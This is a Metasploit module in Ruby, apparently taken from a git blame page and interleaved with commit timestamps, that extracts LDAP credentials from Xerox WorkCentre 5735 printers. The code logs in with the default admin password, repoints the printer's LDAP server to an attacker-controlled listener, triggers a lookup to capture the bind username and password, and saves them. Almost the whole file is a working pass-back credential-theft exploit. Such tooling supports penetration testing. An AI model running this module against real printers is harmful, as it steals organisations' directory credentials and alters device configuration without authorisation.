2014-10-27 20:52:12 +00:00
|
|
|
#
|
2014-10-30 18:51:44 +00:00
|
|
|
# This module requires Metasploit: http://metasploit.com/download
|
2014-10-27 20:52:12 +00:00
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
|
|
##
|
2014-10-30 18:51:44 +00:00
|
|
|
|
2014-10-27 20:52:12 +00:00
|
|
|
require 'rex/proto/http'
|
|
|
|
require 'msf/core'
|
|
|
|
|
|
|
|
class Metasploit3 < Msf::Auxiliary
|
|
|
|
include Msf::Exploit::Remote::HttpClient
|
|
|
|
include Msf::Exploit::Remote::TcpServer
|
|
|
|
include Msf::Auxiliary::Report
|
|
|
|
|
|
|
|
def initialize(info={})
|
|
|
|
super(update_info(info,
|
2014-10-30 18:51:44 +00:00
|
|
|
'Name' => 'Xerox Workcentre 5735 LDAP Service Redential Extractor',
|
2014-11-03 19:37:45 +00:00
|
|
|
'Description' => %q{
|
|
|
|
This module extract the printer's LDAP username and password from Xerox Workcentre 5735.
|
2014-10-27 20:52:12 +00:00
|
|
|
},
|
|
|
|
'Author' =>
|
|
|
|
[
|
|
|
|
'Deral "Percentx" Heiland',
|
|
|
|
'Pete "Bokojan" Arzamendi'
|
|
|
|
],
|
|
|
|
'License' => MSF_LICENSE
|
|
|
|
))
|
|
|
|
|
|
|
|
register_options(
|
|
|
|
[
|
|
|
|
OptBool.new('SSL', [true, 'Negotiate SSL for outgoing connections', false]),
|
|
|
|
OptString.new('PASSWORD', [true, 'Password to access administrative interface. Defaults to 1111', '1111']),
|
2014-10-30 18:51:44 +00:00
|
|
|
OptPort.new('RPORT', [true, 'The target port on the remote printer. Defaults to 80', 80]),
|
2014-10-27 20:52:12 +00:00
|
|
|
OptInt.new('TIMEOUT', [true, 'Timeout for printer connection probe.', 20]),
|
|
|
|
OptInt.new('TCPDELAY', [true, 'Number of seconds the tcp server will wait before termination.', 20]),
|
|
|
|
OptString.new('NewLDAPServer', [true, 'The IP address of the LDAP server you want the printer to connect back to.'])
|
|
|
|
], self.class)
|
|
|
|
end
|
|
|
|
|
|
|
|
def run
|
2014-10-30 18:51:44 +00:00
|
|
|
print_status("#{peer} - Attempting to extract LDAP username and password...")
|
2014-10-27 20:52:12 +00:00
|
|
|
|
|
|
|
@auth_cookie = default_page
|
2014-10-28 20:13:16 +00:00
|
|
|
if @auth_cookie.blank?
|
2014-10-30 18:51:44 +00:00
|
|
|
print_status("#{peer} - Unable to get authentication cookie from #{rhost}")
|
2014-10-28 20:13:16 +00:00
|
|
|
return
|
|
|
|
end
|
2014-10-27 20:52:12 +00:00
|
|
|
|
|
|
|
status = login
|
|
|
|
return unless status
|
|
|
|
|
|
|
|
status = ldap_server_info
|
|
|
|
return unless status
|
|
|
|
|
|
|
|
status = update_ldap_server
|
|
|
|
return unless status
|
|
|
|
|
|
|
|
start_listener
|
|
|
|
unless @data
|
2014-10-30 18:51:44 +00:00
|
|
|
print_error("#{peer} - Failed to start listiner or the printer did not send us the creds. :(")
|
2014-10-27 20:52:12 +00:00
|
|
|
status = restore_ldap_server
|
|
|
|
unless status
|
2014-10-30 18:51:44 +00:00
|
|
|
print_error("#{peer} - Failed to restore old LDAP server. Please manually restore")
|
2014-10-27 20:52:12 +00:00
|
|
|
end
|
|
|
|
return
|
|
|
|
end
|
|
|
|
|
|
|
|
status = restore_ldap_server
|
|
|
|
return unless status
|
|
|
|
|
2014-10-28 20:13:16 +00:00
|
|
|
ldap_binary_creds = @data.scan(/(\w+\\\w+).\s*(.+)/).flatten
|
2014-10-27 20:52:12 +00:00
|
|
|
ldap_creds = "#{ldap_binary_creds[0]}:#{ldap_binary_creds[1]}"
|
|
|
|
|
2014-10-30 18:51:44 +00:00
|
|
|
# Woot we got creds so lets save them.#
|
|
|
|
print_good("#{peer} - The following creds were capured: #{ldap_creds}")
|
2014-10-27 20:52:12 +00:00
|
|
|
loot_name = 'ldap.cp.creds'
|
|
|
|
loot_type = 'text/plain'
|
|
|
|
loot_filename = 'ldap-creds.text'
|
|
|
|
loot_desc = 'LDAP Pass-back Harvester'
|
|
|
|
p = store_loot(loot_name, loot_type, datastore['RHOST'], @data, loot_filename, loot_desc)
|
2014-10-30 18:51:44 +00:00
|
|
|
print_status("#{peer} - Credentials saved in: #{p}")
|
2014-10-27 20:52:12 +00:00
|
|
|
|
|
|
|
register_creds('ldap', rhost, @ldap_port, ldap_binary_creds[0], ldap_binary_creds[1])
|
|
|
|
end
|
|
|
|
|
|
|
|
def default_page
|
2014-10-30 18:51:44 +00:00
|
|
|
page = '/header.php?tab=status'
|
2014-10-27 20:52:12 +00:00
|
|
|
method = 'GET'
|
2014-10-30 18:51:44 +00:00
|
|
|
res = make_request(page, method, '')
|
2014-10-27 20:52:12 +00:00
|
|
|
if res.blank? || res.code != 200
|
2014-10-30 18:51:44 +00:00
|
|
|
print_error("#{peer} - Failed to connect to #{rhost}. Please check the printers IP address.")
|
|
|
|
return ''
|
2014-10-27 20:52:12 +00:00
|
|
|
end
|
|
|
|
res.get_cookies
|
|
|
|
end
|
|
|
|
|
|
|
|
def login
|
|
|
|
login_page = '/userpost/xerox.set'
|
2014-10-28 20:13:16 +00:00
|
|
|
login_vars = {
|
|
|
|
'_fun_function' => 'HTTP_Authenticate_fn',
|
|
|
|
'NextPage' => '%2Fproperties%2Fauthentication%2FluidLogin.php',
|
|
|
|
'webUsername' => 'admin',
|
|
|
|
'webPassword' => datastore['PASSWORD'],
|
|
|
|
'frmaltDomain' => 'default'
|
|
|
|
}
|
|
|
|
login_post_data = []
|
|
|
|
login_vars.each_pair{|k, v| login_post_data << "#{k}=#{v}" }
|
|
|
|
login_post_data *= '&'
|
2014-10-27 20:52:12 +00:00
|
|
|
method = 'POST'
|
|
|
|
|
|
|
|
res = make_request(login_page, method, login_post_data)
|
|
|
|
if res.blank? || res.code != 200
|
2014-10-30 18:51:44 +00:00
|
|
|
print_error("#{peer} - Failed to login. Please check the password for the Administrator account")
|
|
|
|
return nil
|
2014-10-27 20:52:12 +00:00
|
|
|
end
|
|
|
|
res.code
|
|
|
|
end
|
|
|
|
|
|
|
|
def ldap_server_info
|
|
|
|
ldap_info_page = '/ldap/index.php?ldapindex=default&from=ldapConfig'
|
|
|
|
method = 'GET'
|
|
|
|
res = make_request(ldap_info_page, method, '')
|
|
|
|
html_body = ::Nokogiri::HTML(res.body)
|
|
|
|
ldap_server_settings_html = html_body.xpath('/html/body/form[1]/div[1]/div[2]/div[2]/div[2]/div[1]/div/div').text
|
|
|
|
ldap_server_ip = ldap_server_settings_html.scan(/valIpv4_1_\d\[2\] = (\d+)/i).flatten
|
|
|
|
ldap_port_settings = html_body.xpath('/html/body/form[1]/div[1]/div[2]/div[2]/div[2]/div[4]/script').text
|
|
|
|
ldap_port_number = ldap_port_settings.scan(/valPrt_1\[2\] = (\d+)/).flatten
|
|
|
|
@ldap_server = "#{ldap_server_ip[0]}.#{ldap_server_ip[1]}.#{ldap_server_ip[2]}.#{ldap_server_ip[3]}"
|
|
|
|
@ldap_port = ldap_port_number[0]
|
2014-10-30 18:51:44 +00:00
|
|
|
print_status("#{peer} - LDAP server: #{@ldap_server}")
|
2014-10-27 20:52:12 +00:00
|
|
|
unless res.code == 200 || res.blank?
|
2014-10-30 18:51:44 +00:00
|
|
|
print_error("#{peer} - Failed to get LDAP data.")
|
|
|
|
return nil
|
2014-10-27 20:52:12 +00:00
|
|
|
end
|
|
|
|
res.code
|
|
|
|
end
|
|
|
|
|
|
|
|
def update_ldap_server
|
|
|
|
ldap_update_page = '/dummypost/xerox.set'
|
2014-10-28 20:13:16 +00:00
|
|
|
ldap_update_vars = {
|
|
|
|
'_fun_function' => 'HTTP_Set_Config_Attrib_fn',
|
|
|
|
'NextPage' => '/ldap/index.php?ldapindex=default',
|
|
|
|
'from' =>'ldapConfig',
|
|
|
|
'ldap.server[default].server' => "#{datastore['NewLDAPServer']}:#{datastore['SRVPORT']}",
|
|
|
|
'ldap.maxSearchResults' => '25',
|
|
|
|
'ldap.searchTime' => '30',
|
|
|
|
}
|
|
|
|
ldap_update_post = []
|
|
|
|
ldap_update_vars.each_pair{|k, v| ldap_update_post << "#{k}=#{v}" }
|
|
|
|
ldap_update_post *= '&'
|
2014-10-27 20:52:12 +00:00
|
|
|
method = 'POST'
|
2014-10-28 20:13:16 +00:00
|
|
|
|
2014-10-30 18:51:44 +00:00
|
|
|
print_status("#{peer} - Updating LDAP server: #{datastore['NewLDAPServer']} and port: #{datastore['SRVPORT']}")
|
2014-10-27 20:52:12 +00:00
|
|
|
res = make_request(ldap_update_page, method, ldap_update_post)
|
|
|
|
if res.blank? || res.code != 200
|
2014-10-30 18:51:44 +00:00
|
|
|
print_error("#{peer} - Failed to update LDAP server. Please check the host: #{rhost}")
|
|
|
|
return nil
|
2014-10-27 20:52:12 +00:00
|
|
|
end
|
|
|
|
res.code
|
|
|
|
end
|
|
|
|
|
|
|
|
def trigger_ldap_request
|
|
|
|
ldap_trigger_page = '/userpost/xerox.set'
|
2014-10-28 20:13:16 +00:00
|
|
|
ldap_trigger_vars = {
|
|
|
|
'nameSchema'=>'givenName',
|
|
|
|
'emailSchema'=>'mail',
|
|
|
|
'phoneSchema'=>'telephoneNumber',
|
|
|
|
'postalSchema'=>'postalAddress',
|
|
|
|
'mailstopSchema'=>'l',
|
|
|
|
'citySchema'=>'physicalDeliveryOfficeName',
|
|
|
|
'stateSchema'=>'st',
|
|
|
|
'zipCodeSchema'=>'postalcode',
|
|
|
|
'countrySchema'=>'co',
|
|
|
|
'faxSchema'=>'facsimileTelephoneNumber',
|
|
|
|
'homeSchema'=>'homeDirectory',
|
|
|
|
'memberSchema'=>'memberOf',
|
|
|
|
'uidSchema'=>'uid',
|
|
|
|
'ldapSearchName'=>'test',
|
|
|
|
'ldapServerIndex'=>'default',
|
|
|
|
'_fun_function'=>'HTTP_LDAP_Search_fn',
|
|
|
|
'NextPage'=>'%2Fldap%2Fmappings.php%3Fldapindex%3Ddefault%26from%3DldapConfig'
|
|
|
|
}
|
|
|
|
ldap_trigger_post = []
|
|
|
|
ldap_trigger_vars.each_pair {|k, v| ldap_trigger_post << "#{k}=#{v}" }
|
|
|
|
ldap_trigger_post *= '&'
|
2014-10-27 20:52:12 +00:00
|
|
|
method = 'POST'
|
2014-10-28 20:13:16 +00:00
|
|
|
|
2014-10-30 18:51:44 +00:00
|
|
|
print_status("#{peer} - Triggering LDAP reqeust")
|
2014-10-27 20:52:12 +00:00
|
|
|
res = make_request(ldap_trigger_page, method, ldap_trigger_post)
|
|
|
|
res.code
|
|
|
|
end
|
|
|
|
|
|
|
|
def start_listener
|
|
|
|
server_timeout = datastore['TCPDELAY'].to_i
|
|
|
|
begin
|
|
|
|
print_status('Service running. Waiting for connection')
|
|
|
|
Timeout.timeout(server_timeout) do
|
|
|
|
exploit
|
|
|
|
end
|
|
|
|
rescue Timeout::Error
|
|
|
|
return
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
def primer
|
|
|
|
trigger_ldap_request
|
|
|
|
end
|
|
|
|
|
|
|
|
def on_client_connect(client)
|
|
|
|
on_client_data(client)
|
|
|
|
end
|
|
|
|
|
|
|
|
def on_client_data(client)
|
|
|
|
@data = client.get_once
|
|
|
|
client.stop
|
|
|
|
end
|
|
|
|
|
|
|
|
def restore_ldap_server
|
|
|
|
ldap_restore_page = '/dummypost/xerox.set'
|
2014-10-28 20:13:16 +00:00
|
|
|
ldap_restore_vars = {
|
|
|
|
'_fun_function' => 'HTTP_Set_Config_Attrib_fn',
|
|
|
|
'NextPage' => '/ldap/index.php?ldapaction=add',
|
|
|
|
'ldapindex' => 'default&from=ldapConfig',
|
|
|
|
'ldap.server[default].server' => "#{@ldap_server}:#{@ldap_port}",
|
|
|
|
'ldap.maxSearchResults' => '25',
|
|
|
|
'ldap.searchTime' => '30',
|
|
|
|
'ldap.search.uid' => 'uid',
|
|
|
|
'ldap.search.name' => 'givenName',
|
|
|
|
'ldap.search.email' => 'mail',
|
|
|
|
'ldap.search.phone' => 'telephoneNumber',
|
|
|
|
'ldap.search.postal' => 'postalAddress',
|
|
|
|
'ldap.search.mailstop' => 'l',
|
|
|
|
'ldap.search.city' => 'physicalDeliveryOfficeName',
|
|
|
|
'ldap.search.state' => 'st',
|
|
|
|
'ldap.search.zipcode' => 'postalcode',
|
|
|
|
'ldap.search.country' => 'co',
|
|
|
|
'ldap.search.ifax' => 'No Mappings Available',
|
|
|
|
'ldap.search.faxNum' => 'facsimileTelephoneNumber',
|
|
|
|
'ldap.search.home' => 'homeDirectory',
|
|
|
|
'ldap.search.membership' => 'memberOf'
|
|
|
|
}
|
|
|
|
ldap_restore_post = []
|
|
|
|
ldap_restore_vars.each_pair {|k, v| ldap_restore_post << "#{k}=#{v}" }
|
|
|
|
ldap_restore_post *= '&'
|
2014-10-27 20:52:12 +00:00
|
|
|
method = 'POST'
|
2014-10-28 20:13:16 +00:00
|
|
|
|
2014-10-30 18:51:44 +00:00
|
|
|
print_status("#{peer} - Restoring LDAP server: #{@ldap_server}")
|
2014-10-27 20:52:12 +00:00
|
|
|
res = make_request(ldap_restore_page, method, ldap_restore_post)
|
|
|
|
if res.blank? || res.code != 200
|
2014-10-30 18:51:44 +00:00
|
|
|
print_error("#{peer} - Failed to restore LDAP server: #{@ldap_server}. Please fix manually")
|
|
|
|
return nil
|
2014-10-27 20:52:12 +00:00
|
|
|
end
|
|
|
|
res.code
|
|
|
|
end
|
|
|
|
|
|
|
|
def make_request(page, method, post_data)
|
2014-10-30 18:51:44 +00:00
|
|
|
res = nil
|
|
|
|
|
2014-10-27 20:52:12 +00:00
|
|
|
begin
|
|
|
|
res = send_request_cgi(
|
|
|
|
{
|
|
|
|
'uri' => page,
|
|
|
|
'method' => method,
|
|
|
|
'cookie' => @auth_cookie,
|
|
|
|
'data' => post_data
|
|
|
|
}, datastore['TIMEOUT'].to_i)
|
2014-10-30 18:51:44 +00:00
|
|
|
|
2014-10-28 20:13:16 +00:00
|
|
|
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError
|
2014-10-30 18:51:44 +00:00
|
|
|
print_error("#{peer} - Connection failed.")
|
2014-10-27 20:52:12 +00:00
|
|
|
end
|
2014-10-30 18:51:44 +00:00
|
|
|
|
|
|
|
res
|
2014-10-27 20:52:12 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
def register_creds(service_name, remote_host, remote_port, username, password)
|
|
|
|
credential_data = {
|
|
|
|
origin_type: :service,
|
|
|
|
module_fullname: self.fullname,
|
|
|
|
workspace_id: myworkspace.id,
|
|
|
|
private_data: password,
|
|
|
|
private_type: :password,
|
|
|
|
username: username
|
|
|
|
}
|
|
|
|
|
|
|
|
service_data = {
|
|
|
|
address: remote_host,
|
|
|
|
port: remote_port,
|
|
|
|
service_name: service_name,
|
|
|
|
protocol: 'tcp',
|
|
|
|
workspace_id: myworkspace_id
|
|
|
|
}
|
|
|
|
|
|
|
|
credential_data.merge!(service_data)
|
|
|
|
credential_core = create_credential(credential_data)
|
|
|
|
|
|
|
|
login_data = {
|
|
|
|
core: credential_core,
|
|
|
|
status: Metasploit::Model::Login::Status::UNTRIED,
|
|
|
|
workspace_id: myworkspace_id
|
|
|
|
}
|
|
|
|
|
|
|
|
login_data.merge!(service_data)
|
|
|
|
create_credential_login(login_data)
|
|
|
|
|
|
|
|
end
|
|
|
|
end
|